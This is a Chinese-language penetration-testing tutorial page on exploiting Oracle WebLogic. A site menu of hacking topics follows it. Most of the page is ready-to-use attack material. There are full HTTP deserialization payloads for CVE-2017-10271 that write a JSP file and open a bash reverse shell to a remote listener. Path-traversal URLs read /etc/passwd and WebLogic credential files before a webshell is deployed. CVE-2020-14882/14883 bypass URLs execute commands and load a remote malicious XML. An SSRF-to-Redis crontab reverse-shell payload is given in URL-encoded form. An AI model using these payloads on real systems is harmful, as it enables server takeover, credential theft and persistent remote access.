# Weblogic漏洞利用总结
**Weblogic是Oracle公司出品的一个应用服务器(application server),确切的说是一个基于Java EE架构的中间件,是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器**
# 漏洞汇总
weblogic一键漏洞扫描检测工具,提供一键poc检测,收录几乎全部weblogic历史漏洞。
下载地址
```
https://github.com/rabbitmask/WeblogicScan #原版
https://github.com/dr0op/WeblogicScan #修改版,多一个CVE检测,高亮美化
https://github.com/21superman/weblogic_exploit #21superman写的,漏洞比较全面
#使用方法
python3 WeblogicScan.py [ip] [port]
```
## 0、CVE-2017-10271
**漏洞简述**
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。
**漏洞影响版本**
10.3.6.0.0
12.1.3.0.0
12.2.1.1.0
12.2.1.2.0。
**漏洞触发地址**
```
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
```
**漏洞复现**
1. 访问触发此漏洞的server
ip:7001//wls-wsat/CoordinatorPortType
2. 使用burp抓取请求包后发送至repeater模块,将数据包修改成构造好的payload
```
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 637
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><java version="1.4.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
<void method="println"><string>
<![CDATA[
<% out.print("123"); %>
]]>
</string>
</void>
<void method="close"/>
</object></java></java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
```
3. 提交,发现成功写入123
**反弹shell**
1. 构造好反弹shell的命令,在vps上使用nc监听4444端口
```
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 637
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0"> <string>/bin/bash</string> </void>
<void index="1"> <string>-c</string> </void>
<void index="2"> <string>bash -i >$amp; /dev/tcp/x.x.x.x/4444 0>$amp;1</string> </void>
</array>
<void method="start"/> </void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
```
2. 监听`nc -lvp 4444`;成功反弹
![3496f2fb35e0fd32a614e5386b5dc1c7.png](../../_resources/b66158a898064932bb61fc50b9ca6dc6.png)
成功反弹
## 1、CVE-2019-2618
**漏洞简述**
利用任意文件读取来获取weblogic的弱口令登录进入后台,然后通过上传getshell,通过构造任意文件下载漏洞环境读取到后台用户名和密码,然后登陆进后台,上传webshell。
**漏洞影响版本**
10.3.6.0
12.1.3.0
12.2.1.3
**漏洞复现**
### ①任意文件读取
1. 访问url (http://IP:7001/hello/file.jsp?path=/etc/passwd) , 成功读取到系统账号和密码
不过只能读取一些文件,如何更深层次利用这个漏洞呢?
2. 获取加密的对称密钥对
weblogic密码使用AES(老版本3DES)加密,只需要找到用户的密文与加密时的密钥即可。
两个文件均位于base_domain下,名为SerializedSystemIni.dat和config.xml。
SerializedSystemIni.dat是一个二进制文件,所以一定要用burpsuite来读取,用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码,这就是密钥,右键copy to file就可以保存成一个文件:
```
#SerializedSystemIni.dat使用bp的路径
http://yourIp:7001/hello/file.jsp?path=security/SerializedSystemIni.dat
```
config.xml是base_domain的全局配置文件,所以乱七八糟的内容比较多,找到其中的的值,即为加密后的管理员密码
```
#config.xml路径
http://yourIP:7001/hello/file.jsp?path=config/config.xml
```
3. 下载工具进行解密
下载地址:https://github.com/TideSec/Decrypt_Weblogic_Password
使用其中的工具5进行解密
### ②后台上传getshell
1. 使用解密后的账号密码登录后台,weblogic常见的弱密码
```
https://cirt.net/passwords?criteria=weblogic
这里使用 用户名:weblogic 密码:Oracle@123 登录
```
2. 进入后台后点击左边的部署,找到可以上传文件的地址
3. 生成一个war包木马(使用冰蝎的一句话shell)
`jar -cvf shell.war shell.jsp`
4. 生成war后将war马部署上去
5. 使用冰蝎进行连接(默认密码为rebeyond),成功getshell
## 2、CVE-2020-14883:权限绕过漏洞
远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console。权限绕过漏洞(CVE-2020-14883),访问以下URL,未授权访问到管理后台页面(低权限的用户)
>/console/images/%252E%252E%252Fconsole.portal
/console/css/%252e%252e%252fconsole.portal(小写可绕过补丁)
/console/css/%25%32%65%25%32%65%25%32%66console.portal
此时的权限很低,并不能在后台安装应用,所以需要结合CVE-2020-14882漏洞
## 3、CVE-2020-14882 : 代码执行漏洞
**漏洞影响版本**
>Oracle Weblogic Server 10.3.6.0.0
>Oracle Weblogic Server 12.1.3.0.0
>Oracle Weblogic Server 12.2.1.3.0
>Oracle Weblogic Server 12.2.1.4.0
>Oracle Weblogic Server 14.1.1.0.0
结合 CVE-2020-14883 漏洞,远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic Server Console 执行任意代码。
**该漏洞有两个利用手法**
```
利用 com.tangosol.coherence.mvel2.sh.ShellSession 执行命令
利用 com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext 执行命令
```
### 2 利用第一条命令
先在dnslog获取一个专属域名,然后使用payload执行命令
```
http://IP:7001//console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('curl%20xx.dnslog.cn');")
```
然后查看dnslog中是否有相关信息日志
也可以直接访问URL执行系统命令,
```
http://ip:端口/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")
```
执行完成后进入/tmp中查看是否有新建的文件
> 这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10版本并不存在com.tangosol.coherence.mvel2.sh.ShellSession 类
### 2 利用第二条命令
一种更为通杀的方法,对于所有Weblogic版本均有效。
但是必须可以出网,要可以访问到恶意的xml。
首先需要构造一个XML文件,并将其保存外网(漏洞机或者可访问的一台机子上)上
XML文件:
```xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[curl pnw46y.dnslog.cn]]></value>
</list>
</constructor-arg>
</bean>
</beans>
```
然后通过构造如下URL,即可让Weblogic加载这个XML,并执行其中的命令:
```
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://ip.xml")
```
### 3 **getshell**
可以直接下载大佬写好的工具,下载地址(https://github.com/backlion/CVE-2020-14882_ALL)
## 5、ssrf漏洞
**漏洞描述**
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
SSRF漏洞可以通过篡改获取资源的请求发送给服务器,但是服务器并没有检测这个请求是否合法的,然后服务器以他的身份来访问其他服务器的资源。
**漏洞影响范围**
Oracle WebLogic Server 10.3.6.0
Oracle WebLogic Server 10.0.2.0
**漏洞复现**
浏览器访问存在漏洞的地址 SearchPublicRegistries.jsp
```
http://192.168.31.187:7001/uddiexplorer/SearchPublicRegistries.jsp
```
1. 使用burp抓包
看到参数operator的参数是一个url,这个就是利用点 ,构造请求,
2. 通过改变url的端口来做一个端口检测
存在的端口将会得到错误关键字`error code`
不存在的端口将会返回错误`could not connect over HTTP to server`。
如果访问的非http协议(内网),则会返回`did not have a valid SOAP content-type`。
## 6、利用redis反弹shell
weblogic的ssrf有一个比较大的特点,其虽然是一个GET请求,但是我们可以通过传入**%0a%0d**来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就是说我们可以通过该SSRF攻击内网中的redis服务器。首先通过ssrf探测内网中的redis服务器,通常redis端口为6379
1. 首先,通过ssrf探测内网中的redis服务器
一般端口是6379
2. 构造redis反弹shell命令
```sh
test
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.191.3/4444 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
aaa
```
3. url编码后,进行绕过拦截
```
http://ip/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn%2A%20%2A%20%2A%20%2A%20%2A%20root%20bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E191%2E3%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa%0A%0A%0D%0A
```
4. 使用nc(windows)监听4444端口
5. 将url编码后的payload使用bp,用POST请求发送
6. 成功反弹shell
7. 然后可以进入redis服务器进行想做的操作
- src导航站
- kali和msf
- 信息收集
- 收集域名信息
- Whois 查询
- 备案信息查询
- 信用信息查询
- IP反查站点的站
- 浏览器插件
- 收集子域名信息
- 在线平台
- 工具枚举
- ssl与证书透明度
- DNS历史解析
- DNS域传送漏洞
- C段探测
- JS文件域名&ip探测
- 搜索引擎&情报社区
- google黑客
- 威胁情报
- 钟馗之眼
- 收集相关应用信息
- 微信公众号&微博
- APP收集&反编译
- 收集常用端口信息
- 常见端口&解析&总结
- 扫描工具
- 网络空间引擎搜索
- 浏览器插件
- nmap扫描
- 收集敏感信息
- 源码泄露
- 邮箱信息收集
- 备份文件泄露
- 目录&后台扫描
- 公网网盘
- 历史资产
- 指纹&WAF&CDN识别
- 指纹识别
- CDN识别
- 绕过CDN查找真实IP
- WAF识别
- 漏洞资源和社工
- 漏洞公共资源库
- 社会工程
- 资产梳理
- 各种对渗透有帮助的平台
- 扫描器
- 扫描器对比
- AppScan(IBM)_web和系统
- AWVS_web扫描
- X-Scan_系统扫描
- WebInspect_HP_WEB
- Netsparker_web
- WVSS_绿盟_web
- 安恒明鉴
- Nessus_系统
- nexpose_系统
- 启明天镜_web_系统
- SQL注入
- 常用函数
- sql注入步骤
- union注入和information_schema库
- 函数和报错注入
- SQL盲注
- 其他注入方式
- 防止SQL注入解决方案
- Access数据库注入
- MSSQL数据库注入
- MYSQL数据库注入
- 神器SQLmap
- xss跨站脚本攻击
- xss原理和分类
- xss案例和修复
- xss绕过技巧
- xss案例
- 文件上传下载包含
- 常有用文件路径
- 文件上传漏洞
- 文件下载漏洞
- 文件包含漏洞
- upload-labs上传漏洞练习
- XXE、SSRF、CSRF
- SSRF原理基础
- SSRF案例实战
- CSRF原理基础
- CSRF案例及防范
- XXE之XML_DTD基础
- XXE之payload与修复
- XXE结合SSRF
- 远程命令执行与反序列化
- 远程命令和代码执行漏洞
- 反序列化漏洞
- 验证码与暴力破解
- 爆破与验证码原理
- CS架构暴力破解
- BS架构暴力破解
- WEB编辑器漏洞
- 编辑器漏洞基础
- Ewebeditor编辑器
- FCKeditor编辑器
- 其他编辑器
- web中间件漏洞
- 中间件解析漏洞
- Tomcat常见的漏洞总结
- Jboss漏洞利用总结
- Weblogic漏洞利用总结
- WEB具体步骤
- 旁注和越权
- CDN绕过
- 越权与逻辑漏洞
- WEB应用常见其他漏洞
- WEB登陆页面渗透思路
- 获取WEBshell思路
- 社工、钓鱼、apt
- 社工和信息收集
- 域名欺骗
- 钓鱼邮件
- 一些钓鱼用的挂马工具
- 代码审计
- 代码审计工具
- WAF绕过
- WAF基础及云WAF
- 各种WAF绕过方法
- 绕过WAF上传文件
- 系统提权
- windows系统提权
- linux系统提权
- 数据库提权操作系统
- 内网横向渗透
- 内网穿透方式
- 一些内网第三方应用提权
- ARP与DOS
- ARP欺骗
- DOS与DDOS
- 一些DOS工具